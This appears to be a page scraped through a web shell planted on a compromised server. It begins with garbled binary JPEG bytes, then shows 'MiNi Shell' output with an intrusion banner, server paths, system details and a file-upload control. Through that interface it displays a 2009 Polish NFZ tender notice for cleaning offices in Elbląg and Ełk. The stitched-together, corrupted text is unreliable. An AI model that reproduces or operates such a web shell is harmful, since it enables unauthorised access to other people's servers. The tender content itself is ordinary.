JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/163420-N-2009.html

<p class="kh_header"><b>Olsztyn: Sprzątanie Delegatur w Elblągu i Ełku.</b><br>
<b>Numer ogłoszenia: 163420 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Fundusz Zdrowia Warmińsko-Mazurski Oddział Wojewódzki w Olsztynie , ul. Żołnierska 16, 10-561 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5327405, faks 089 5339174.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nfz-olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie Delegatur w Elblągu i Ełku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa sprzątania:
CZĘŚĆ 1 ZAMÓWIENIA- Wykonanie usługi sprzątania pomieszczeń Warmińsko-Mazurskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia Delegatura w Elblągu, ul. Bema 18a. codzienne odkurzanie wykładzin - powierzchnia: ok. 336 m2
b. codzienne mycie na mokro podłóg pokoi i korytarzy - powierzchnia: ok. 69,20 m2
c. codzienne sprzątanie biurek, stołów korytarzowych i stołów konferencyjnych oraz wszelkiego typu urządzeń elektronicznych (wycieranie kurzu i innych nieczystości środkami chemicznymi), ilość: 19 sztuk,
d. pranie na mokro 1 raz w roku wszelkiego typu foteli, krzeseł tapicerskich (obitych materiałem) dywanów i wykładzin podłogowych powierzchnia: 336 m2 oraz krzesła i fotele w ilość takiej jak            w punkcie e
e. codzienne odkurzanie i trzepanie foteli i krzeseł tapicerskich (obitych materiałem) oraz w miarę potrzeb czyszczenia ich na sucho lub na mokro - ilość: 48 sztuk
f. codzienne wycieranie ma mokro parapetów okiennych, ilość: 19 sztuk
g. czyszczenie szyb i ram okiennych oraz dwustronne mycie okien - dwukrotnie w ciągu roku (wiosną, w miesiącach marzec-kwiecień, jesienią, w miesiącach wrzesień-październik) - ilość: 20 sztuk
h. codzienne mycie płytek ceramicznych i urządzeń sanitarnych w łazienkach wraz z uzupełnianiem papieru toaletowego, mydła w płynie - ilość pojemników: 5 sztuk, każdy o pojemności: 0,5 litra, kostek toaletowych do muszli - ilość łazienek: 5 o łącznej powierzchni: 30,00 m2, ilość muszli: 5 sztuk, ilość zlewów: 6 sztuk, ilość luster: 2 sztuki, papier toaletowy w rolkach o wielkości: szerokość rolki 95 mm - wysokość rolki 145 mm, ilość podajników do papieru: 5 sztuk
i. codzienne opróżnianie koszy na śmieci z wymianą worków na śmieci - pojemności worków - 35 litrów, liczba koszy - 18, wynoszenie śmieci na podwórko do śmietników i utrzymanie czystości chodnika przed budynkiem (latem  i zimą) - zbieranie nieczystości ,odśnieżanie dojścia do budynku 
(dotyczy powierzchni około 60m2)

CZĘŚĆ 2 ZAMÓWIENIA - Wykonanie usługi sprzątania pomieszczeń oraz posesji Warmińsko-Mazurskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia Delegatura w Ełku, ul. Chopina 15 obejmującej:
a. codzienne odkurzanie wykładzin - powierzchnia dywanów i wykładzin dywanowych - ok. 180 m2
b. codzienne mycie na mokro podłóg pokoi i korytarzy - powierzchnia: ok. 504 m2
c. codzienne sprzątanie biurek, stołów korytarzowych i stołów konferencyjnych oraz wszelkiego typu urządzeń elektronicznych (wycieranie kurzu i innych nieczystości środkami chemicznymi), ilość: 36 sztuk
d. pranie na mokro 1 raz w roku wszelkiego typu foteli, krzeseł tapicerskich (obitych materiałem) dywanów i wykładzin podłogowych, powierzchnia: ok. 180 m2 oraz krzesła i fotele w ilość takiej jak            w punkcie e
e. codzienne odkurzanie i trzepanie foteli i krzeseł tapicerskich oraz w miarę potrzeb czyszczenia ich na sucho lub na mokro - ilość: krzesła tapicerowane standardowe 72 szt.; krzesła korytarzowe                  2 szt.(po 3 siedziska); krzesła z obiciem skóro-podobnym 4 szt.; kanapa z obiciem skóro-podobnym    1 szt.
f. codzienne wycieranie ma mokro parapetów okiennych, ilość: 21 sztuk
g. czyszczenie szyb i ram okiennych oraz dwustronne mycie okien - dwukrotnie w ciągu roku (wiosną, w miesiącach marzec-kwiecień, jesienią, w miesiącach wrzesień-październik) - Stolarka okienna - plastikowa. Okna nietypowe (ilość: okna - 21, drzwi przeszklone - 5, drzwi balkonowe - 2)
h. codzienne mycie płytek ceramicznych i urządzeń sanitarnych w łazienkach wraz z uzupełnianiem papieru toaletowego, mydła w płynie - ilość pojemników: 3 sztuki, każdy o pojemności: 0,75 litra, kostek toaletowych do muszli - ilość łazienek: 4 o łącznej powierzchni: ok. 29 m2, ilość muszli:            5 sztuk, ilość zlewów: 5 sztuk, ilość luster: 4 sztuki, ilość podajników do papieru: 7 sztuk - papier toaletowy w rolkach - standardowy
i. codzienne opróżnianie koszy na śmieci z wymianą worków na śmieci - liczba koszy - 15 szt., - każdy         o pojemności 35 l, wynoszenie śmieci na podwórko do śmietników
j. utrzymywanie posesji w czystości tj. zamiatanie latem i odśnieżanie zimą (powierzchnia terenu utwardzonego wokół budynku - ok. 730 m2 + przylegający do działki chodnik)
k. strzyżenie trawników (powierzchnia trawników - ok. 97 m2).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. na podstawie Art. 24 Ust. Prawo Zamówień Publicznych 




Opis oceny spełniania warunków:
	1) Potencjał kadrowy:
a) Wykonawca zobowiązany jest wskazać do wykonania niniejszego zamówienia osoby,                   z których każda posiada wynikający z jednej umowy (kontraktu, zlecenia) co najmniej                6 miesięczny staż pracy polegający na sprzątaniu w obiektach biurowych
	2) Doświadczenie:
a) Wykonawca musi wykazać, że w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną, trwającą co najmniej 12 miesięcy w ramach jednej umowy, usługę sprzątania w obiektach biurowych, o łącznej powierzchni przekraczającej odpowiednio: 
	część 1 zamówienia - 400 m2
	część 2 zamówienia - 550 m2 
	3) Potencjał techniczny:
a) Wykonawca musi dysponować odpowiednim sprzętem (w tym m.in. urządzeniami pozwalającymi wykonać usługi prania wykładzin oraz prania tapicerki meblowej) oraz środkami potrzebnymi do wykonania usługi utrzymania czystości w powierzonych obiektach.
	4) Potencjał finansowo-ekonomiczny:
a) Wykonawca musi wykazać posiadanie ubezpieczenia od odpowiedzialności cywilnej                   w zakresie prowadzonej działalności gospodarczej zgodnie z przedmiotem niniejszego zamówienia na wartość co najmniej: 
	część 1 zamówienia: 30 000,00 zł (trzydzieści tysięcy złotych)
	część 2 zamówienia: 30 000,00 zł (trzydzieści tysięcy złotych)
3. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunki określone w ust. 2.

Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych           w dziale IV przedmiotowego postępowania oświadczeń i dokumentów, wg. formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń:

1.	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 pkt 1-3 ustawy Prawo zamówień publicznych.
2.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24. ust. 1 i 2 ustawy Prawo zamówień publicznych (załączono do druku oferty)
Wykaz dokumentów:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2.	Informację o osobach, które będą skierowane do wykonania zamówienia (Potencjał kadrowy). Do informacji muszą być dołączone dokumenty potwierdzające, że osoby, które będą skierowane do realizacji zamówienia posiadają wynikający z jednej umowy (kontraktu, zlecenia) co najmniej                6 miesięczny staż pracy polegający na sprzątaniu w obiektach biurowych
3.	Informację o doświadczeniu zawodowym Wykonawcy (Doświadczenie zawodowe). Do informacji muszą być dołączone dokumenty potwierdzające, że wymienione w informacji prace zostały wykonane należycie.
4.	Wykaz środków czystości i sprzętu, które będą zastosowane przy realizacji zamówienia.
5.	Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, w tym działalności zgodnej z przedmiotem niniejszego zamówienia, na kwoty nie mniejsze niż wymagane przez Zamawiającego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.nfz-olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Narodowy Fundusz Zdrowia
Warmińsko-Mazurski Oddział Wojewódzki
ul.Żołnierska 16
10-561  Olsztyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2009 godzina 10:00, miejsce: Narodowy Fundusz Zdrowia
Warmińsko-Mazurski Oddział Wojewódzki
ul.Żołnierska 16
10-561  Olsztyn, I piętro, pokój 110.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie usługi sprzątania pomieszczeń Warmińsko-Mazurskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia Delegatura w Elblągu, ul. Bema 18.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usługi sprzątania pomieszczeń Warmińsko-Mazurskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia Delegatura w Elblągu, ul. Bema 18 obejmującej:
a. codzienne odkurzanie wykładzin - powierzchnia: ok. 336 m2
b. codzienne mycie na mokro podłóg pokoi i korytarzy - powierzchnia: ok. 69,20 m2
c. codzienne sprzątanie biurek, stołów korytarzowych i stołów konferencyjnych oraz wszelkiego typu urządzeń elektronicznych (wycieranie kurzu i innych nieczystości środkami chemicznymi), ilość: 19 sztuk,
d. pranie na mokro 1 raz w roku wszelkiego typu foteli, krzeseł tapicerskich (obitych materiałem) dywanów i wykładzin podłogowych powierzchnia: 336 m2 oraz krzesła i fotele w ilość takiej jak            w punkcie e
e. codzienne odkurzanie i trzepanie foteli i krzeseł tapicerskich (obitych materiałem) oraz w miarę potrzeb czyszczenia ich na sucho lub na mokro - ilość: 48 sztuk
f. codzienne wycieranie ma mokro parapetów okiennych, ilość: 19 sztuk
g. czyszczenie szyb i ram okiennych oraz dwustronne mycie okien - dwukrotnie w ciągu roku (wiosną, w miesiącach marzec-kwiecień, jesienią, w miesiącach wrzesień-październik) - ilość: 20 sztuk
h. codzienne mycie płytek ceramicznych i urządzeń sanitarnych w łazienkach wraz z uzupełnianiem papieru toaletowego, mydła w płynie - ilość pojemników: 5 sztuk, każdy o pojemności: 0,5 litra, kostek toaletowych do muszli - ilość łazienek: 5 o łącznej powierzchni: 30,00 m2, ilość muszli: 5 sztuk, ilość zlewów: 6 sztuk, ilość luster: 2 sztuki, papier toaletowy w rolkach o wielkości: szerokość rolki 95 mm - wysokość rolki 145 mm, ilość podajników do papieru: 5 sztuk
i. codzienne opróżnianie koszy na śmieci z wymianą worków na śmieci - pojemności worków - 35 litrów, liczba koszy - 18, wynoszenie śmieci na podwórko do śmietników i utrzymanie czystości chodnika przed budynkiem (latem  i zimą) - zbieranie nieczystości ,odśnieżanie dojścia do budynku 
(dotyczy powierzchni około 60m2).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie usługi sprzątania pomieszczeń oraz posesji Warmińsko-Mazurskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia Delegatura w Ełku, ul. Chopina 15.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usługi sprzątania pomieszczeń oraz posesji Warmińsko-Mazurskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia Delegatura w Ełku, ul. Chopina 15 obejmującej:
a. codzienne odkurzanie wykładzin - powierzchnia dywanów i wykładzin dywanowych - ok. 180 m2
b. codzienne mycie na mokro podłóg pokoi i korytarzy - powierzchnia: ok. 504 m2
c. codzienne sprzątanie biurek, stołów korytarzowych i stołów konferencyjnych oraz wszelkiego typu urządzeń elektronicznych (wycieranie kurzu i innych nieczystości środkami chemicznymi), ilość: 36 sztuk
d. pranie na mokro 1 raz w roku wszelkiego typu foteli, krzeseł tapicerskich (obitych materiałem) dywanów i wykładzin podłogowych, powierzchnia: ok. 180 m2 oraz krzesła i fotele w ilość takiej jak            w punkcie e
e. codzienne odkurzanie i trzepanie foteli i krzeseł tapicerskich oraz w miarę potrzeb czyszczenia ich na sucho lub na mokro - ilość: krzesła tapicerowane standardowe 72 szt.; krzesła korytarzowe                  2 szt.(po 3 siedziska); krzesła z obiciem skóro-podobnym 4 szt.; kanapa z obiciem skóro-podobnym    1 szt.
f. codzienne wycieranie ma mokro parapetów okiennych, ilość: 21 sztuk
g. czyszczenie szyb i ram okiennych oraz dwustronne mycie okien - dwukrotnie w ciągu roku (wiosną, w miesiącach marzec-kwiecień, jesienią, w miesiącach wrzesień-październik) - Stolarka okienna - plastikowa. Okna nietypowe (ilość: okna - 21, drzwi przeszklone - 5, drzwi balkonowe - 2)
h. codzienne mycie płytek ceramicznych i urządzeń sanitarnych w łazienkach wraz z uzupełnianiem papieru toaletowego, mydła w płynie - ilość pojemników: 3 sztuki, każdy o pojemności: 0,75 litra, kostek toaletowych do muszli - ilość łazienek: 4 o łącznej powierzchni: ok. 29 m2, ilość muszli:            5 sztuk, ilość zlewów: 5 sztuk, ilość luster: 4 sztuki, ilość podajników do papieru: 7 sztuk - papier toaletowy w rolkach - standardowy
i. codzienne opróżnianie koszy na śmieci z wymianą worków na śmieci - liczba koszy - 15 szt., - każdy         o pojemności 35 l, wynoszenie śmieci na podwórko do śmietników
j. utrzymywanie posesji w czystości tj. zamiatanie latem i odśnieżanie zimą (powierzchnia terenu utwardzonego wokół budynku - ok. 730 m2 + przylegający do działki chodnik)
k. strzyżenie trawników (powierzchnia trawników - ok. 97 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com